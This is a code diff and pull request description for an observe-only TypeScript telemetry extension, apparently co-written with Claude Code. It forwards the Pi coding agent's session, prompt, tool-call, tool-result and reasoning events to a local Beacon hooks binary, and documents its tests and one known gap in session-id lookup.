+    const typed = block as Record<string, unknown>
+    const type = firstString(typed.type)
+    if (types && !types.includes(type)) continue
+    const text = firstString(typed.text, typed.content, typed.thinking, typed.reasoning)
+    if (text) parts.push(text)
+  }
+  return parts.join("\n")
+}
+
+function toRecord(value: unknown): Record<string, unknown> | undefined {
+  if (!value || typeof value !== "object" || Array.isArray(value)) return undefined
+  return value as Record<string, unknown>
+}
+
+export default function beaconEndpointExtension(pi: {
+  on: (event: string, handler: (event: any, ctx: any) => unknown) => unknown
+}): void {
+  // Every payload carries the same context. Built per event because cwd and the active model can
+  // both change during a session.
+  const base = (type: string, event: Record<string, unknown>, ctx: Record<string, unknown>) => {
+    const payload: Record<string, unknown> = { type }
+    const id = sessionId(event, ctx)
+    if (id) payload.session_id = id
+    const cwd = firstString(ctx?.cwd)
+    if (cwd) payload.cwd = cwd
+    const model = modelName(ctx?.model)
+    if (model) payload.model = model
+    const file = sessionFile(ctx)
+    if (file) payload.session_file = file
+    const reason = firstString(event?.reason)
+    if (reason) payload.reason = reason
+    return payload
+  }
+
+  // Handlers return nothing, deliberately and in every case.
+  //
+  // Pi reads a handler's return value as a directive: a truthy result from tool_call blocks the
+  // call, and one from tool_result or input rewrites what the agent sees. An observation-only
+  // extension that leaked its send() result would silently change the agent's behavior, which is
+  // exactly the failure a telemetry tool must not have. `void` on each call is what makes that
+  // impossible rather than merely unlikely.
+  pi.on("session_start", (event, ctx) => {
+    void send(base("session_start", event, ctx))
+  })
+
+  pi.on("session_shutdown", async (event, ctx) => {
+    // Awaited, unlike the rest: this is the last event of the session, and Pi may exit as soon as
+    // the handler resolves. Firing and forgetting here loses the session-end event on a fast exit.
+    await send(base("session_shutdown", event, ctx))
+  })
+
+  pi.on("input", (event, ctx) => {
+    const prompt = firstString(event?.text, event?.input, event?.value, event?.prompt)
+    if (!prompt) return
+    void send({ ...base("input", event, ctx), prompt })
+  })
+
+  pi.on("tool_call", (event, ctx) => {
+    void send({
+      ...base("tool_call", event, ctx),
+      tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
+      tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
+      // event.input is mutable and Pi may hand the same object to other extensions after this one.
+      // A shallow copy keeps the payload describing the arguments as they were at this moment.
+      tool_input: { ...(toRecord(event?.input) ?? {}) },
+    })
+  })
+
+  pi.on("tool_result", (event, ctx) => {
+    const details = toRecord(event?.details)
+    const response: Record<string, unknown> = {}
+    const output = contentText(event?.content)
+    if (output) response.output = output
+    if (details) {
+      response.details = details
+      // Hoisted to the top level because that is where Beacon reads a command's exit code from; a
+      // nested one would leave every shell result reporting no status at all.
+      const exitCode = details.exitCode ?? details.exit_code ?? details.exit ?? details.status
+      if (typeof exitCode === "number") response.exit_code = exitCode
+    }
+    void send({
+      ...base("tool_result", event, ctx),
+      tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
+      tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
+      tool_input: { ...(toRecord(event?.input) ?? {}) },
+      tool_response: response,
+      is_error: event?.isError === true,
+    })
+  })
+
+  pi.on("message_end", (event, ctx) => {
+    const message = toRecord(event?.message) ?? toRecord(event)
+    if (!message) return
+    // Only assistant messages carry usage and reasoning. A user message here would produce a
+    // response event with no model and no tokens, duplicating what the input event already said.
+    if (firstString(message.role) !== "assistant") return
+
+    const payload: Record<string, unknown> = { ...base("message_end", event, ctx) }
+    const model = modelName({ provider: message.provider, id: message.model }) || modelName(ctx?.model)
+    if (model) payload.model = model
+    // Pi's usage object is forwarded as-is. Beacon maps its members onto gen_ai.usage and drops
+    // what the schema has no member for; doing that translation here would put schema decisions in
+    // the layer that cannot be updated without a reinstall.
+    const usage = toRecord(message.usage)
+    if (usage) payload.usage = usage
+    const finish = firstString(message.stopReason, message.finishReason)
+    if (finish) payload.finish_reason = finish
+    const id = firstString(message.id)
+    if (id) payload.message_id = id
+    const reasoning = contentText(message.content, ["thinking", "reasoning"])
+    if (reasoning) payload.reasoning = reasoning
+
+    void send(payload)
+  })
+
+  pi.on("agent_end", (event, ctx) => {
+    void send(base("agent_end", event, ctx))
+  })
+}

--- a/plugins/pi-beacon/src/beacon.ts
+++ b/plugins/pi-beacon/src/beacon.ts
@@ -246,8 +246,10 @@ export default function beaconEndpointExtension(pi: {
       const exitCode = details.exitCode ?? details.exit_code ?? details.exit ?? details.status
       if (typeof exitCode === "number") response.exit_code = exitCode
     }
+    const durationMs = details?.durationMs ?? details?.duration_ms
     void send({
       ...base("tool_result", event, ctx),
+      ...(typeof durationMs === "number" ? { duration_ms: durationMs } : {}),
       tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
       tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
       tool_input: { ...(toRecord(event?.input) ?? {}) },


### PR DESCRIPTION
Third of seven. **Base is `pi-pr2-hooks` (#348).** The TypeScript forwarder Beacon installs into Pi. Observe-only — it never blocks a tool call. Ships in-repo and is CI-checked; nothing installs it yet (that's #4).

## Scope

`plugins/pi-beacon/` with the extension, its tests, and a README; a checked-in copy under `hooks/assets/pi/` that Go embeds, with `bun run check` failing if the two drift; and a CI step mirroring the opencode plugin's.

No mapping decision lives in this file. This is the layer that cannot be fixed without rewriting installed copies, so what counts as a file edit, what gets redacted, and how tokens reach the schema all stay in Go (#348).

## Two departures from the opencode plugin, both correctness

**argv, not a shell command string.** The opencode plugin runs its command through `/bin/sh -lc`. That is fine there and would not be here: Pi installs through npm on Windows as readily as on macOS, and neither cmd.exe nor PowerShell parses a POSIX-quoted command line. Spawning argv directly removes the shell entirely, so a profile directory containing a space, a `$`, or a backslash is carried as one argument. The whole array literal is the substitution token, so the template parses both before and after the installer rewrites it — which is what lets `bun --check` verify the template itself.

**`node:child_process`, not `Bun.spawn`.** Pi runs on Node.

## Every handler returns nothing, and a test enforces it

Pi reads a handler's return value as a directive: truthy from `tool_call` blocks the call, truthy from `input` or `tool_result` rewrites what the agent sees. An observation-only extension that leaked its `send()` result would silently change the agent's behavior — the one failure a telemetry tool must not have. `void` on each call makes that impossible rather than merely unlikely, and `TestNoHandlerReturnsAValue` walks every registered handler asserting `undefined`.

## Other properties under test

- **`session_shutdown` is awaited**, unlike the rest. It is the last event of the session and Pi may exit as soon as the handler resolves; firing and forgetting loses it on a fast exit. The test gates the sender and asserts the handler has not resolved before the payload goes out.
- **Content blocks are flattened, not stringified.** Pi delivers message and tool-result content as typed blocks; `String()` of that array is `"[object Object]"`, which would have been stored as the tool's output and hashed as retained content while describing nothing.
- **`event.input` is copied.** It is mutable and Pi hands the same object to later extensions. Without a copy, a later extension rewriting the arguments would retroactively change what Beacon reported — telemetry describing a command that was never submitted. The test mutates the event after the call and asserts the payload is unchanged.
- **Failures are swallowed.** Missing binary, non-zero exit, timeout: logged under `BEACON_PI_DEBUG=1`, dropped otherwise. Bounded at 2s with an unref'd timer so an in-flight send never holds Pi's exit open.
- **Usage is forwarded verbatim.** Beacon decides what maps onto the schema, including dropping `totalTokens`.

## Verification

17 unit tests via an injected sender (no process spawned), plus an **end-to-end run under Node against the real hooks binary**: a rendered extension driving all seven events produced 8 endpoint events with correct actions, session correlation, and token usage including cost.

```
session.started           pi_cli  e2e-1
prompt.submitted          pi_cli  e2e-1
tool.invoked              pi_cli  e2e-1
command.executed          pi_cli  e2e-1
agent.response.completed  pi_cli  e2e-1   {"cache_read":{"input_tokens":400},"cost_usd":0.007,...}
agent.reasoning           pi_cli  e2e-1
session.status            pi_cli  e2e-1
session.ended             pi_cli  e2e-1
```

## Known gap, documented rather than papered over

Pi's session id is read through `ctx.sessionManager`, but the published extension docs **do not name the accessor**. `sessionId()` tries several plausible spellings and accepts an empty result: Beacon records an event without `session.id` rather than dropping it, so an unknown shape degrades to uncorrelated telemetry instead of silence. Both behaviors are tested.

Worth confirming against a live Pi session before this ships to users, then narrowing the list. `beacon-hooks` needs no change either way. Called out in the README's "Known gap" section so it doesn't get lost.

---
_Generated by [Claude Code](https://claude.ai/code/session_01QFCTrDvdDQxFpuj9by8vJd)_

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> New agent-side telemetry that spawns a local binary and reads session/tool/prompt data. Observe-only and not installed yet, but handler-return and session-id guessing are easy to get wrong in production.
> 
> **Overview**
> Adds the TypeScript Pi extension Beacon will install: an observe-only forwarder that maps Pi events into the hooks-binary JSON contract and never returns a value Pi could treat as a directive.
> 
> `plugins/pi-beacon` is the source of truth (tests + README). A checked-in copy is embedded for the Go installer, with `bun run check` failing on drift. CI now typechecks and tests it the same way as the OpenCode plugin. Mapping, redaction, and schema stay in Go; this layer only shapes payloads, copies mutable tool input, flattens content blocks, awaits `session_shutdown`, and swallows send failures. Session-id lookup still guesses undocumented accessors.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 41d26c3c6d0651749a37c07ff5b07565572598b3. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->